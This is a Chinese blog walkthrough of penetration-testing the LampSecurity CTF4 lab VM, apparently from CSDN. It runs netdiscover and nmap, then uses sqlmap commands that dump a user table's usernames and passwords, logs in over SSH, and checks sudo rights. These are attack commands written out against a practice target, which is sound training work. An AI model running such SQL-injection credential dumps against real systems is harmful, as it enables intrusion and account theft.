ctf4靶机渗透

最新推荐文章于 2024-03-09 21:59:32 发布
最新推荐文章于 2024-03-09 21:59:32 发布
阅读量414 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45914445/article/details/117228714
版权

ctf4靶机渗透

文章目录

实验环境:

kali linux的IP地址为192.168.42.137

一、实验过程

1、信息收集
2、漏洞挖掘
3、权限提升

二、使用步骤

1.信息收集

1.1 主机发现

netdiscover -i eth0 -r 192.168.42.0/24

在这里插入图片描述

1.2 端口扫描

nmap -sS -sV -A -v 192.168.42.139

开放的端口

1.3危险建模
25、80、631端口开放
靶机开放端口及对应的服务:
22端口: SSH服务(远程登录服务)
25端口: SMTP服务
80端口: HTTP服务
使用浏览器访问一下ctf4:

在这里插入图片描述
寻找突破点:
在这里插入图片描述通过分析可知有可能存在SQL注入漏洞

2.sqlmap进行漏洞利用

1、sql注入漏洞探测(爆后台数据库)

sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs

在这里插入图片描述
后台数据库:
在这里插入图片描述
查看敏感数据库中的表

sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables

在这里插入图片描述
查看敏感表中的字段:

sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables -T user --columns

在这里插入图片描述
查看敏感字段的内容(爆破用户名和密码):

sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables -T user --columns -C user_name,user_pass --dump

在这里插入图片描述
2.远程登录(22端口):

ssh dstevens@192.168.42.139

报错信息如下:
在这里插入图片描述
解决方法:SSH登录报错
解决后远程登录成功
在这里插入图片描述
提升为root用户:

sudo -l

在这里插入图片描述

weixin_45914445
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF6渗透测试全流程练习靶机
12-14
CTF6渗透测试全流程练习靶机
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
CTF综合靶机渗透
xv66666的博客
08-11 971
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1439
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
VulnHub————CTF4
m0_63200360的博客
09-24 168
本人为新手,发文章只是记录学习笔记,大佬勿喷。文中很多地方有多种解法,并不唯一。
CTF实践 靶机渗透
Radiency的博客
11-23 1431
CTF实践。通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 2839
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
CTF渗透训练环境(镜像,视频,虚拟机)
12-26
靶机镜像,教学视频(SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数...kali虚拟机(2022.4),虚拟机环境(Vmware、VirtualBox),下载环境来进行一次CTF渗透测试
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
网络渗透测试 CTF实践
12-02
实验目的:通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
零基础打靶—CTF4靶场
qq_61861243的博客
12-02 535
复制 license_info.json wa_data.dat 这两个文件到/home/acunetix/.acunetix/data/license/目录,全部替换即可。post 提交后,点击Blog,触发XSS,可以在BeEF页面,可以看到肉鸡上线,这里是本地宿主机这里使用的是本地火狐浏览器访问的,所以肉鸡为本地宿主机。尝试构建SQL注入语句,查看错误信息,order by判断字段发现6 页面报错,5页面没有报错,说明当前表有5列即5个字段。
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 1857
内网代理技术拿下某CTF三层靶机渗透
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3039
Vulnhub-CTF4靶机实战
网络安全竞赛CTF夺旗-攻击——windows靶机漏洞攻防讲解
旺仔Sec&blog
05-25 818
一、项目和任务描述: 假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻找企业网络中可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客的心态,从而改善您的防御策略。 请根据《赛场参数表》提供的信息,在客户端使用谷歌浏览器登录答题平台。 二、操作系统环境说明: 客户机操作系统:Windows 10/Windows7 靶机服务器操作系统:Linux/Windows 三、漏洞情况说明: 1.服务器中的漏洞可能是常规漏洞也可能
CTF4靶场复现步骤
最新发布
weixin_66192597的博客
03-09 350
CTF4靶场攻略
CTF_靶机学习
vurtual的博客
02-27 758
** pwn_2 ** 在学逆向网站开启靶机 把目标文件read复制到虚拟机中 把靶机地址拷贝下来 用objdump -t -j .text read查看文件里的函数 查看到有exploit func函数。其他都是系统的函数。 进入gdb disass func函数 看到有调用read函数。 <+7>和<+12>是系统check栈,不用管。 <+4><+17>一共提升了0x28的空间 disass exploit函数 复制首地址 运行这个pyth
Vulnhub系列之ctf-6靶机
2301_80203701的博客
12-03 120
继续记录自己打靶的学习过程。
CTF靶机 Lian_Yu 笔记
z4yn:)的博客
06-29 336
Lian_Yu 靶机简介:A beginner level security challenge 靶机标签:挑战 目录爆破 隐写术 隐藏 nmap 端口扫描 nmap -sV 10.10.182.140 -p- 访问80端口,查看一下robots.txt文件。没有这个文件 用dirbuster扫一波目录,发现两个目录 这个/island目录下面有个暗号is: 查看页面源代码,发现暗号被用白色字体“隐藏”起来了 框选一下全文,暗号出来了。vigilante 暂时不知
ctf5靶机 sql
07-28
抱歉,我无法回答关于CTF靶机的问题。 #### 引用[.reference_title] - *1* *3* [Vulnhub-CTF6靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124817304)[target="_blank" data-report-click={"spm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值